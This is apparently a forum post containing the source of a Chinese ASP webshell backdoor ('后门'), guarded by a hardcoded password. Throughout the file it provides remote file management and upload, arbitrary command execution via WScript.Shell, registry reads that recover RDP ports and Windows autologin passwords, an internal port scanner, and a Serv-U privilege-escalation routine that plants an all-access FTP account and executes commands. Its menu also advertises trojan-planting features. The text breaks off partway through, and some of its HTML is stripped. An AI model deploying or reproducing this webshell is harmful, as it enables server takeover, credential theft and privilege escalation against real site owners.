作者:k78283381 | 2022-11-11 14:32
<%
Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next
UserPass="643617" '密码
mName="BY:.尐飛" '后门名字
Copyright="注:请勿用于非法用途,否则后果作者概不负责" '版权
Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next
sub ShowErr()
If Err Then
RRS"
" &
Err.Description & "
"
Err.Clear:Response.Flush
End If
end sub
Sub RRS(str)
response.write(str)
End Sub
Function RePath(S)
RePath=Replace(S,"\","\\")
End Function
Function RRePath(S)
RRePath=Replace(S,"\\","\")
End Function
URL=Request.ServerVariables("URL")
ServerIP=Request.ServerVariables("LOCAL_ADDR")
Action=Request("Action")
RootPath=Server.MapPath(".")
WWWRoot=Server.MapPath("/")
serveru=request.servervariables("http_host")&url
serverp=userpass
FolderPath=Request("FolderPath")
FName=Request("FName")
BackUrl="
返回
"
RRS"charset=gb2312"">"
RRS""&mName1&" - "&ServerIP&" "
RRS""
RRS"body,td{font-size: 12px;background-color:#000000;color:#eee;}"
RRS"input,select,textarea{font-size: 12px;background-
color:#ddd;border:1px solid #fff}"
RRS".C{background-color:#000000;border:0px}"
RRS".cmd{background-color:#000;color:#FFF}"
RRS"body{margin: 0px;margin-left:4px;}"
RRS"a{color:#ddd;text-decoration: none;}a:hover
{color:red;background:#000}"
RRS".am{color:#888;font-size:11px;}"
RRS""
RRS"function killErrors(){return true;}
window.onerror=killErrors;"
RRS"function yesok(){if (confirm(""确认要执行此操作吗?""))return
true;else return false;}"
RRS"function runClock(){theTime = window.setTimeout(""runClock()"",
100);var today = new Date();var display= today.toLocaleString
();window.status=""→"&AD&" --""+display;}runClock();"
RRS"function ShowFolder(Folder){top.addrform.FolderPath.value =
Folder;top.addrform.submit();}"
RRS"function FullForm(FName,FAction){top.hideform.FName.value =
FName;if(FAction==""CopyFile""){DName = prompt(""请输入复制到目标文件全
名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""MoveFile""){DName = prompt(""请输入移动到目标文件全名
称"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""CopyFolder""){DName = prompt(""请输入移动到目标文件夹全名称
"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""MoveFolder""){DName = prompt(""请输入移动到目标文件夹全名称
"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""NewFolder""){DName = prompt(""请输入要新建的文件夹全名
称"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}
if(DName!=null){top.hideform.Action.value =
FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}"
RRS""
rrs "If Action="" then RRS " scroll=no"
rrs ">"
Dim ObT(13,2)
ObT(0,0) = "Scripting.FileSystemObject"
ObT(0,2) = "文件操作组件"
ObT(1,0) = "wscript.shell"
ObT(1,2) = "命令行执行组件"
ObT(2,0) = "ADOX.Catalog"
ObT(2,2) = "ACCESS建库组件"
ObT(3,0) = "JRO.JetEngine"
ObT(3,2) = "ACCESS压缩组件"
ObT(4,0) = "Scripting.Dictionary"
ObT(4,2) = "数据流上传辅助组件"
ObT(5,0) = "Adodb.connection"
ObT(5,2) = "数据库连接组件"
ObT(6,0) = "Adodb.Stream"
ObT(6,2) = "数据流上传组件"
ObT(7,0) = "SoftArtisans.FileUp"
ObT(7,2) = "SA-FileUp 文件上传组件"
ObT(8,0) = "LyfUpload.UploadFile"
ObT(8,2) = "刘云峰文件上传组件"
ObT(9,0) = "Persits.Upload.1"
ObT(9,2) = "ASPUpload 文件上传组件"
ObT(10,0) = "JMail.SmtpMail"
ObT(10,2) = "JMail 邮件收发组件"
ObT(11,0) = "CDONTS.NewMail"
ObT(11,2) = "虚拟SMTP发信组件"
ObT(12,0) = "SmtpMail.SmtpMail.1"
ObT(12,2) = "SmtpMail发信组件"
ObT(13,0) = "Microsoft.XMLHTTP"
ObT(13,2) = "数据传输组件"
For i=0 To 13
Set T=Server.CreateObject(ObT(i,0))
If -2147221005 <> Err Then
IsObj=" √"
Else
IsObj=" ×"
Err.Clear
End If
Set T=Nothing
ObT(i,1)=IsObj
Next
If FolderPath<>"" then
Session("FolderPath")=RRePath(FolderPath)
End If
If Session("FolderPath")="" Then
FolderPath=RootPath
Session("FolderPath")=FolderPath
End if
Function MainForm()
RRS"target=""FileFrame"">"
RRS""
RRS""
RRS""
RRS"cellspacing='0'>"
RRS""
RRS""
RRS"target='_parent'>"
RRS"地址栏:"
RRS"("FolderPath")&"'>"
RRS" | type='submit' value='转到'> onclick='FileFrame.location.reload()'>"
RRS"
"
RRS"height='100%' frameborder='0'>"
RRS""
RRS"height='100%' frameborder='1'>"
RRS" |
"
End Function
if request("web")="admin" then
Session("web2a2dmin") = UserPass
URL()
end if
Function MainForm()
RRS"target=""FileFrame"">"
RRS""
RRS""
RRS""
RRS"cellspacing='0'>"
RRS""
RRS""
RRS"target='_parent'>"
RRS"地址栏:"
RRS"("FolderPath")&"'>"
RRS" | type='submit' value='转到'> onclick='FileFrame.location.reload()'>"
RRS"
"
RRS"height='100%' frameborder='0'>"
RRS""
RRS"height='100%' frameborder='1'>"
RRS" |
"
End Function
Function MainMenu()
RRS""
RRS"|
"
RRS"color=red>"&mName2&""
RRS" |
"
If ObT(0,1)=" ×" Then
RRS"无权限
"
Else
RRS" ↓查看硬
盘onmouseout=""menu1.style.display='none'"">"
Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
RRS"
("""&RePath(WWWRoot)&""")'>->站点根目录
"
RRS"(RootPath)&""")'>→本程序目录
"
RRS"Files"")'>→Program Files
"
RRS"and Settings\\All Users\\Documents"")'>->Documents
"
RRS"and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere"")'>-
>pcAnywhere
"
RRS"and Settings\\All Users\\「开始」菜单\\程序"")'>->开始 → 程序
"
End If
RRS"→
系统服务-用户账号
"
RRS"target='FileFrame'>→终端端口-自动登录
"
RRS"target='FileFrame'>→服务信息-组件支持
"
RRS"
→执行CMD命令
"
RRS"
→端口扫描器
"
RRS"→
Serv-u提权
"
RRS"→
读取注册表
"
RRS"(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>→新建目录
"
RRS"
→新建文本
"
RRS"→
上传文件
"
RRS"→查
找木马
"
RRS"
→高级挂马
"
RRS"
→批量清马
"
RRS"
→批量替换
"
RRS"
→低级挂马
"
RRS"→退出登
录
"
RRS"style='color:red'>
"&Copyright2&"
"
RRS""
End Function
Sub unPack(thePath)
On Error Resume Next
Server.ScriptTimeOut = 5000
Dim rs, ws, str, conn, stream, connStr, theFolder
str = Server.MapPath(".") & "\"
Set rs = CreateObject("ADODB.RecordSet")
Set stream = CreateObject("ADODB.Stream")
Set conn = CreateObject("ADODB.Connection")
connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=" & thePath & ";"
conn.Open connStr
rs.Open "FileData", conn, 1, 1
stream.Open
stream.Type = 1
Do Until rs.Eof
theFolder = Left(rs("thePath"), InStrRev(rs
("thePath"), "\"))
If fsoX.FolderExists(str & theFolder) = False
Then
createFolder(str & theFolder)
End If
stream.SetEos()
stream.Write rs("fileContent")
stream.SaveToFile str & rs("thePath"), 2
rs.MoveNext
Loop
rs.Close
conn.Close
stream.Close
Set ws = Nothing
Set rs = Nothing
Set stream = Nothing
Set conn = Nothing
End Sub
Sub createFolder(thePath)
Dim i
i = Instr(thePath, "\")
Do While i > 0
If fsoX.FolderExists(Left(thePath, i)) = False
Then
fsoX.CreateFolder(Left(thePath, i - 1))
End If
If InStr(Mid(thePath, i + 1), "\") Then
i = i + Instr(Mid(thePath, i + 1), "\")
Else
i = 0
End If
Loop
End Sub
Function Course()
SI="
cellpadding='0' align='center'>"
SI=SI&"系
统用户与服务
"
on error resume next
for each obj in getObject("WinNT://.")
err.clear
if OBJ.StartType="" then
SI=SI&""
SI=SI&" "
SI=SI&obj.Name
SI=SI&" "
SI=SI&"系统用户(组)"
SI=SI&"
"
SI0="colspan=""2"">
"
end if
if OBJ.StartType=2 then lx="自动"
if OBJ.StartType=3 then lx="手动"
if OBJ.StartType=4 then lx="禁用"
if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then
SI1=SI1&"bgcolor=""#FFFFFF""> "&obj.Name&"bgcolor=""#FFFFFF""> "&obj.DisplayName&"bgcolor=""#FFFFFF"" colspan=""2"">[启动类型:"&lx&"]color=#FF0000> "&obj.path&"
"
else
SI2=SI2&"bgcolor=""#FFFFFF""> "&obj.Name&"bgcolor=""#FFFFFF""> "&obj.DisplayName&"bgcolor=""#FFFFFF"" colspan=""2"">[启动类型:"&lx&"]color=#3399FF> "&obj.path&"
"
end if
next
RRS SI&SI0&SI1&SI2&""
End Function
Function ServerInfo()
SI="
cellpadding='0' align='center'>"
SI=SI&"服
务器组件信息
"
SI=SI&"bgcolor='#FFFFFF'>服务器名 bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"
"
SI=SI&"name='ipform' target='_blank'>width='200' bgcolor='#FFFFFF'>服务器IPbgcolor='#FFFFFF'> "
SI=SI&"value='"&Request.ServerVariables("LOCAL_ADDR")
&"'style='border:0px'>询'style='border:0px'>value='2'>
"
SI=SI&"bgcolor='#FFFFFF'>服务器时间 bgcolor='#FFFFFF'>"&now&" "
SI=SI&"bgcolor='#FFFFFF'>服务器CPU数量bgcolor='#FFFFFF'> bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")
&""
SI=SI&"bgcolor='#FFFFFF'>服务器操作系统bgcolor='#FFFFFF'> bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&""
SI=SI&"bgcolor='#FFFFFF'>WEB服务器版本bgcolor='#FFFFFF'> bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")
&""
For i=0 To 13
SI=SI&"bgcolor='#FFFFFF'>"&ObT(i,0)&""&ObT(i,1)
&""&ObT(i,2)&""
Next
RRS SI
End Function
Function DownFile(Path)
Response.Clear
Set OSM = CreateObject(ObT(6,0))
OSM.Open
OSM.Type = 1
OSM.LoadFromFile Path
sz=InstrRev(path,"\")+1
Response.AddHeader "Content-Disposition", "attachment; filename=" &
Mid(path,sz)
Response.AddHeader "Content-Length", OSM.Size
Response.Charset = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite OSM.Read
Response.Flush
OSM.Close
Set OSM = Nothing
End Function
Function HTMLEncode(S)
if not isnull(S) then
S = replace(S, ">", ">")
S = replace(S, "<", "<")
S = replace(S, CHR(39), "'")
S = replace(S, CHR(34), """)
S = replace(S, CHR(20), " ")
HTMLEncode = S
end if
End Function
Function UpFile()
If Request("Action2")="Post" Then
Set U=new UPC : Set F=U.UA("LocalFile")
UName=U.form("ToPath")
If UName="" Or F.FileSize=0 then
SI="
请输入上传的完全路径后选择一个文件上传!"
Else
F.SaveAs UName
If Err.number=0 Then
SI="
文件"&UName&"上传成功!"
End if
End If
Set F=nothing:Set U=nothing
SI=SI&BackUrl
RRS SI
ShowErr()
Response.End
End If
SI="
align='center'>"
SI=SI&"Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
SI=SI&""
SI=SI&"上传路径:("FolderPath")&"\diy3.asp")&"' size='40'>"
SI=SI&" "
SI=SI&" "
SI=SI&" |
"
RRS SI
End Function
Function Cmd1Shell()
checked=" checked"
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "diy3.asp"
if Request("wscript")<>"yes" then checked=""
If Request("cmd")<>"" Then DefCmd = Request("cmd")
SI=""
SI=SI&"SHELL路径:Style='width:70%'> "
SI=SI&"value='yes'"&checked&">WScript.Shell"
SI=SI&" type='submit' value='执行'>class='cmd'>"
If Request.Form("cmd")<>"" Then
if Request.Form("wscript")="yes" then
Set CM=CreateObject(ObT(1,0))
Set DD=CM.exec(ShellPath&" /c "&DefCmd)
aaa=DD.stdout.readall
SI=SI&aaa
else
On Error Resume Next
Set ws=Server.CreateObject("WScript.Shell")
Set ws=Server.CreateObject("WScript.Shell")
Set fso=Server.CreateObject("Scripting.FileSystemObject")
szTempFile = server.mappath("cmd.txt")
Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
Set fs = CreateObject("Scripting.FileSystemObject")
Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
aaa=Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Call fso.DeleteFile(szTempFile, True)
SI=SI&aaa
end if
End If
SI=SI&chr(13)&""
RRS SI
End Function
if session("web2a2dmin")<>UserPass then
if request.form("pass")<>"" then
if request.form("pass")=UserPass then
session("web2a2dmin")=UserPass
response.redirect url
else
rrs"
注:
请勿用于非法用途,否则后果自负!!!
align=center>HACK by:漫步云端
"
end if
else
si="#222;padding:22px;margin:100px;'>
target='_blank'>"&mname&"
密码: type='submit' value='登录'>
"&Copyright&""
if instr(SI,SIC)<>0 then rrs sI
end if
response.end
end if
Dim T1
Class UPC
Dim D1,D2
Public Function Form(F)
F=lcase(F)
If D1.exists(F) then:Form=D1(F):else:Form="":end if
End Function
Public Function UA(F)
F=lcase(F)
If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
End Function
Private Sub Class_Initialize
Dim
TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
set D1=CreateObject(ObT(4,0))
if Request.TotalBytes<1 then Exit Sub
set T1 = CreateObject(ObT(6,0))
T1.Type = 1 : T1.Mode =3 : T1.Open
T1.Write Request.BinaryRead(Request.TotalBytes)
T1.Position=0 : TDa =T1.Read : DStart = 1
DEnd = LenB(TDa)
set D2=CreateObject(ObT(4,0))
vbCrlf = chrB(13) & chrB(10)
set T2 = CreateObject(ObT(6,0))
TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
TLen = LenB (TSt)
DStart=DStart+TLen+1
while (DStart + 10) < DEnd
DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
T2.Type = 1 : T2.Mode =3 : T2.Open
T1.Position = DStart
T1.CopyTo T2,DIEnd-DStart
T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
TIn = T2.ReadText : T2.Close
DStart = InStrB(DIEnd,TDa,TSt)
FStart = InStr(22,TIn,"name=""",1)+6
FEnd = InStr(FStart,TIn,"""",1)
UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
if InStr (45,TIn,"filename=""",1) > 0 then
set TFL=new FIF
FStart = InStr(FEnd,TIn,"filename=""",1)+10
FEnd = InStr(FStart,TIn,"""",1)
FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
FEnd = InStr(FStart,TIn,vbCr)
TFL.FileStart =DIEnd
TFL.FileSize = DStart -DIEnd -3
if not D2.Exists(UpName) then
D2.add UpName,TFL
end if
else
T2.Type =1 : T2.Mode =3 : T2.Open
T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
T2.Position = 0 : T2.Type = 2
T2.Charset ="gb2312"
SFV = T2.ReadText
T2.Close
if D1.Exists(UpName) then
D1(UpName)=D1(UpName)&", "&SFV
else
D1.Add UpName,SFV
end if
end if
DStart=DStart+TLen+1
wend
TDa=""
set T2 =nothing
End Sub
Private Sub Class_Terminate
if Request.TotalBytes>0 then
D1.RemoveAll:D2.RemoveAll
set D1=nothing:set D2=nothing
T1.Close:set T1 =nothing
end if
End Sub
End Class
Class FIF
dim FileSize,FileStart
Private Sub Class_Initialize
FileSize = 0
FileStart= 0
End Sub
Public function SaveAs(F)
dim T3
SaveAs=true
if trim(F)="" or FileStart=0 then exit function
set T3=CreateObject(ObT(6,0))
T3.Mode=3 : T3.Type=1 : T3.Open
T1.position=FileStart
T1.copyto T3,FileSize
T3.SaveToFile F,2
T3.Close
set T3=nothing
SaveAs=false
end function
End Class
Class LBF
Dim CF
Private Sub Class_Initialize
SET CF=CreateObject(ObT(0,0))
End Sub
Private Sub Class_Terminate
Set CF=Nothing
End Sub
Function ShowDriver()
For Each D in CF.Drives
RRS" ("""&D.DriveLetter&":\\"")'>本地磁盘 ("&D.DriveLetter&":)
"
Next
End Function
Function Show1File(Path)
Set FOLD=CF.GetFolder(Path)
i=0
SI="cellpadding='0'>"
For Each F in FOLD.subfolders
SI=SI&""
SI=SI&"&""")' title=""打开"">size='6'>0"&F.Name&""
SI=SI&" _(Path&"\"&F.Name)&""",""CopyFolder"")' onclick='return yesok()'
class='am' title='复制'>复制"
SI=SI&" (Path&"\"&F.Name,"\","\\")&""",""DelFolder"")' onclick='return yesok
()' class='am' title='删除'>删除"
SI=SI&" (Path&"\"&F.Name)&""",""MoveFolder"")' onclick='return yesok()'
class='am' title='移动'>移动"
SI=SI&" (Path&"\"&F.Name)&""",""DownFile"")' onclick='return yesok()'
class='am' title='下载'>下载"
i=i+1
If i mod 3 = 0 then SI=SI&"
"
Next
SI=SI&"
|
"
RRS SI &"" :
SI=""
For Each L in Fold.files
SI="cellpadding='0'>"
SI=SI&""
SI=SI&"(Path&"\"&L.Name)&""",""DownFile"");' title='下载'>face='wingdings' size='4'>2"&L.Name&""
SI=SI&"href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""EditFile"")' class='am' title='编辑'>编辑"
SI=SI&"href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除"
SI=SI&"href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""CopyFile"")' class='am' title='复制'>复制"
SI=SI&"href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""MoveFile"")' class='am' title='移动'>移动"
SI=SI&""&clng(L.size/1024)&"K"
SI=SI&""&L.Type&""
SI=SI&""&L.DateLastModified&""
SI=SI&""
RRS SI:SI=""
Next
Set FOLD=Nothing
End function
Function DelFile(Path)
If CF.FileExists(Path) Then
CF.DeleteFile Path
SI="
文件 "&Path&" 删除成功!"
SI=SI&BackUrl
RRS SI
End If
End Function
Function EditFile(Path)
If Request("Action2")="Post" Then
Set T=CF.CreateTextFile(Path)
T.WriteLine Request.form("content")
T.close
Set T=nothing
SI="
文件保存成功!"
SI=SI&BackUrl
RRS SI
Response.End
End If
If Path<>"" Then
Set T=CF.opentextfile(Path, 1, False)
Txt=HTMLEncode(T.readall)
T.close
Set T=Nothing
Else
Path=Session("FolderPath")&"\newfile.asp":Txt="新建文件"
End If
SI=SI&"name='EditForm'>"
SI=SI&""
SI=SI&"
"
SI=SI&"style='width:100%;height:450'>"&Txt&"
"
SI=SI&"
onclick='history.back();'> type='reset' value='重置'> type='submit' value='保存'>"
RRS SI
End Function
Function CopyFile(Path)
Path = Split(Path,"||||")
If CF.FileExists(Path(0)) and Path(1)<>"" Then
CF.CopyFile Path(0),Path(1)
SI="
文件"&Path(0)&"复制成功!"
SI=SI&BackUrl
RRS SI
End If
End Function
Function MoveFile(Path)
Path = Split(Path,"||||")
If CF.FileExists(Path(0)) and Path(1)<>"" Then
CF.MoveFile Path(0),Path(1)
SI="
文件"&Path(0)&"移动成功!"
SI=SI&BackUrl
RRS SI
End If
End Function
Function DelFolder(Path)
If CF.FolderExists(Path) Then
CF.DeleteFolder Path
SI="
目录"&Path&"删除成功!"
SI=SI&BackUrl
RRS SI
End If
End Function
Function CopyFolder(Path)
Path = Split(Path,"||||")
If CF.FolderExists(Path(0)) and Path(1)<>"" Then
CF.CopyFolder Path(0),Path(1)
SI="
目录"&Path(0)&"复制成功!"
SI=SI&BackUrl
RRS SI
End If
End Function
Function MoveFolder(Path)
Path = Split(Path,"||||")
If CF.FolderExists(Path(0)) and Path(1)<>"" Then
CF.MoveFolder Path(0),Path(1)
SI="
目录"&Path(0)&"移动成功!"
SI=SI&BackUrl
RRS SI
End If
End Function
Function NewFolder(Path)
If Not CF.FolderExists(Path) and Path<>"" Then
CF.CreateFolder Path
SI="
目录"&Path&"新建成功!"
SI=SI&BackUrl
RRS SI
End If
End Function
End Class
sub getTerminalInfo()
On Error Resume Next
Set wsX = Server.CreateObject("WScript.Shell")
Dim terminalPortPath, terminalPortKey, termPort
Dim autoLoginPath, autoLoginUserKey, autoLoginPassKey
Dim isAutoLoginEnable, autoLoginEnableKey, autoLoginUsername,
autoLoginPassword
terminalPortPath = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp\"
terminalPortKey = "PortNumber"
termPort = wsX.RegRead(terminalPortPath & terminalPortKey)
RRS "终端服务端口及自动登录
"
If termPort = "" Or Err.Number <> 0 Then
RRS"无法得到终端服务端口, 请检查权限是否已经受到限制.
"
Else
RRS "当前终端服务端口: " & termPort & "
"
End If
autoLoginPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\"
autoLoginEnableKey = "AutoAdminLogon"
autoLoginUserKey = "DefaultUserName"
autoLoginPassKey = "DefaultPassword"
isAutoLoginEnable = wsX.RegRead(autoLoginPath & autoLoginEnableKey)
If isAutoLoginEnable = 0 Then
RRS "系统自动登录功能未开启
"
Else
autoLoginUsername = wsX.RegRead(autoLoginPath & autoLoginUserKey)
RRS "自动登录的系统帐户: " & autoLoginUsername & "
"
autoLoginPassword = wsX.RegRead(autoLoginPath & autoLoginPassKey)
If Err Then
Err.Clear
RRS "False"
End If
RRS "自动登录的帐户密码: " & autoLoginPassword & "
"
End If
RRS "
"
End Sub
sub ReadREG()
RRS "注册表键值读取:
"
RRS ""
RRS ""
RRS "value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\
ComputerName' size=80>"
RRS " "
RRS "
"
RRS "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-
DisplayLastUserName,REG_SZ,1 {不显示上次登录用户}
"
RRS
"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,
0 {0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机IPC$共享
}
"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoSha
reServer,REG_DWORD,0 {禁止默认共享}
"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableS
haredNetDrives,REG_SZ,0 {关闭网络共享}
"
RRS
"HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurity
Filters,REG_DWORD,1 {启用TCP/IP筛选(所有试配器)}
"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\IPEnableRouter,REG_DWORD,1 {允许IP路由}
"
RRS "-------以下似乎要看绑定的网卡,不知道是否准确---------
"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A
465128-8E99-4B0C-AFF3-1348DC55EB2E}\DefaultGateway,REG_MUTI_SZ {默认网
关}
"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A
465128-8E99-4B0C-AFF3-1348DC55EB2E}\NameServer {首DNS}
"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-
1348DC55EB2E}\TCPAllowedPorts {允许的TCP/IP端口}
"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-
1348DC55EB2E}\UDPAllowedPorts {允许的UDP端口}
"
RRS "-----------OVER--------------------
"
RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {共几块活动网
卡}
"
RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {当前网卡的
序列(把上面的替换)}
"
RRS ""
RRS "
"
if Request("thePath")<>"" then
On Error Resume Next
Set wsX = Server.CreateObject("WScript.Shell")
thePath=Request("thePath")
theArray=wsX.RegRead(thePath)
If IsArray(theArray) Then
For i=0 To UBound(theArray)
RRS "" & theArray(i)
Next
Else
RRS "" & theArray
End If
end if
end sub
sub ScanPort()
Server.ScriptTimeout = 7776000
if request.Form("port")="" then
PortList="21,23,25,80,110,135,139,445,1433,3389,43958"
else
PortList=request.Form("port")
end if
if request.Form("ip")="" then
IP="127.0.0.1"
else
IP=request.Form("ip")
end if
RRS"端口扫描器
"
RRS"onSubmit='form1.submit.disabled=true;'>"
RRS"Scan IP: "
RRS" value='"&Request.ServerVariables("LOCAL_ADDR")&"' size='60'>"
RRS"
Port List:"
RRS"value='"&PortList&"'>"
RRS"
"
RRS""
RRS""
RRS"
"
If request.Form("scan") <> "" Then
timer1 = timer
RRS("扫描报告:
")
tmp = Split(request.Form("port"),",")
ip = Split(request.Form("ip"),",")
For hu = 0 to Ubound(ip)
If InStr(ip(hu),"-") = 0 Then
For i = 0 To Ubound(tmp)
If Isnumeric(tmp(i)) Then
Call Scan(ip(hu), tmp(i))
Else
seekx = InStr(tmp(i), "-")
If seekx > 0 Then
startN = Left(tmp(i), seekx - 1 )
endN = Right(tmp(i), Len(tmp(i)) - seekx )
If Isnumeric(startN) and Isnumeric(endN) Then
For j = startN To endN
Call Scan(ip(hu), j)
Next
Else
RRS(startN & " or " & endN & " is not number
")
End If
Else
RRS(tmp(i) & " is not number
")
End If
End If
Next
Else
ipStart = Mid(ip(hu),1,InStrRev(ip(hu),"."))
For xxx = Mid(ip(hu),InStrRev(ip(hu),".")+1,1) to Mid(ip(hu),InStr(ip
(hu),"-")+1,Len(ip(hu))-InStr(ip(hu),"-"))
For i = 0 To Ubound(tmp)
If Isnumeric(tmp(i)) Then
Call Scan(ipStart & xxx, tmp(i))
Else
seekx = InStr(tmp(i), "-")
If seekx > 0 Then
startN = Left(tmp(i), seekx - 1 )
endN = Right(tmp(i), Len(tmp(i)) - seekx )
If Isnumeric(startN) and Isnumeric(endN) Then
For j = startN To endN
Call Scan(ipStart & xxx,j)
Next
Else
RRS(startN & " or " & endN & " is not number
")
End If
Else
RRS(tmp(i) & " is not number
")
End If
End If
Next
Next
End If
Next
timer2 = timer
thetime=cstr(int(timer2-timer1))
RRS"
Process in "&thetime&" s"
END IF
end sub
Sub Scan(targetip, portNum)
On Error Resume Next
set conn = Server.CreateObject("ADODB.connection")
connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","&
portNum &";User ID=lake2;Password=;"
conn.ConnectionTimeout = 1
conn.open connstr
If Err Then
If Err.number = -2147217843 or Err.number = -2147467259
Then
If InStr(Err.description, "(Connect()).") > 0
Then
RRS(targetip & ":" & portNum &
".........关闭
")
Else
RRS(targetip & ":" & portNum &
".........开放
")
End If
End If
End If
End Sub
Select Case Action
Case "MainMenu":MainMenu()
Case "getTerminalInfo":getTerminalInfo()
case "ScanPort":ScanPort()
Case "Servu"
SUaction=request("SUaction")
if not isnumeric(SUaction) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "
PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" &
ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" &
vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-
PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" &
vbCrLf & _
"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-
Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-
AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf &
"-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-
SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" &
vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-
QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" &
vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case SUaction
case 1
set a=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True,
"", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser &
quit
set session("a")=a
RRS""
RRS""
RRS""
RRS""
RRS""
RRS""
RRS"value='2'>"
RRS""
RRS"document.write('正在连接 127.0.0.1:"&port&",使用用户名:
"&user&",口令:"&pass&"...');"
RRS"setTimeout('document.all.goldsun.submit();',4000);"
RRS""
case 2
set b=Server.CreateObject("Microsoft.XMLHTTP")
b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2",
True, "", ""
b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd &
vbCrLf & quit
set session("b")=b
RRS""
RRS""
RRS""
RRS""
RRS""
RRS""
RRS"value='3'>"
RRS""
RRS"document.write('正在提升权限,请等待…………');"
RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
RRS""
